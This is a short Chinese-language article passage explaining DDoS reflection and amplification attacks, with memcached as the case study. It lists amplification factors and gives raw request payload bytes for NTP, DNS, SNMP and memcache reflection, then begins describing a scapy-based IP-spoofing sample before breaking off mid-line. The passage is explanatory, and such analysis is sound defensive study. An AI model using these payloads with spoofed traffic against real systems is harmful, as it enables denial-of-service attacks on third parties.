DDoS攻防之反射放大攻击（memcache案例）

0x00、DDoS反射放大攻击攻击者通过伪造原IP欺骗的方式连接特定的UDP Server对目标端进行攻击。攻击UDP协议需要具备一定放大作用· memcache  60000x· NTP 556x· DNS 54x· SSDP 30x· SNMP 15x协议本身存在漏洞ntp · '\x17\x00\x02\x2a'+'\x00'*4· dns · {}\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01· {}\x00\x00\xff\x00\xff\x00\x00\x29\x10\x00· \x00\x00\x00\x00\x00\x00snmp· \x30\x26\x02\x01\x01\x04\x06\x70\x75\x62\x6c· \x69\x63\xa5\x19\x02\x04\x71\xb4\xb5\x68\x02\x01· \x00\x02\x01\x7F\x30\x0b\x30\x09\x06\x05\x2b\x06· \x01\x02\x01\x05\x00memcache· \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n 0x01、攻击原理本文就以最新的memcache做案例分析一下其攻击原理根据3月11日公布的攻击样本 from scapy.all import *//通过python的scapy库来伪造原始IP和UDP包 data = input("[▸] E ………………………………